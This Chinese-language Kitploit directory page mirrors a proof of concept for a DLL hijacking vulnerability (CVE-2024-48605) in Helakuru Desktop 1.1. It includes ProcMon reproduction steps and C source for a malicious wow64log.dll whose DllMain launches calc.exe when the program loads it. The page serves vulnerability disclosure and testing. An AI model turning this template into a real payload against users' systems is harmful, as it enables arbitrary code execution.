Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
HelakuruV.1.1-DLLHijack — Helakuru 版本 1.1 DLL 劫持 - CVE-2024-48605 | Kitploit
工具/GitHubGitHub/surajhacx/helakuruv.1.1-dllhijack
漏洞分析代码分析漏洞利用Payload 开发二进制利用
GitHubsurajhacx/helakuruv.1.1-dllhijack

HelakuruV.1.1-DLLHijack

Helakuru 版本 1.1 DLL 劫持 - CVE-2024-48605

查看仓库
51年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Helakuru 中的 DLL 劫持漏洞

摘要

Helakuru 桌面版 1.1v 可在 64 位和 32 位架构上运行。在测试过程中发现,该程序会尝试加载 wow64log.dll,而现代 Windows 操作系统默认不包含此 DLL。这会导致"Name not found"(名称未找到)错误,使程序面临 DLL 劫持漏洞。通过构造恶意的 wow64log.dll,可以实现任意代码执行。

受影响版本

Helakuru Desktop 1.1v

复现步骤

  1. 使用 ProcMon 监控 DLL 加载
  • ProcMon 显示对 wow64log.dll 的 CreateFile 操作结果为"Name not found"(名称未找到) Pasted image 20240925232040
  1. 创建恶意 wow64log.dll
root@kitploit:~
#include <windows.h>
#include <stdio.h>

void LaunchCalculator()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    const char* calcCmd = "C:\\Windows\\System32\\calc.exe";

    if (!CreateProcessA(
        NULL,          
        (LPSTR)calcCmd, 
        NULL,          
        NULL,          
        FALSE,         
        0,             
        NULL,          
        NULL,          
        &si,           
        &pi))          
    {
        printf("CreateProcess failed (%d).\n", GetLastError());
    }
    else
    {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        LaunchCalculator();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
  1. 运行 Helakuru Desktop
  • 再次启动 Helakuru Desktop。恶意 wow64log.dll 现在将被加载到程序中,触发计算器,作为 DLL 注入成功的演示。 Pasted image 20240925233737
  1. 使用 ProcMon 验证 DLL 加载
  • 重新打开 ProcMon,观察 wow64log.dll 这次已成功加载,确认自定义 DLL 已被程序执行。 Pasted image 20240925232728

影响:该漏洞允许任意代码执行。

下载工具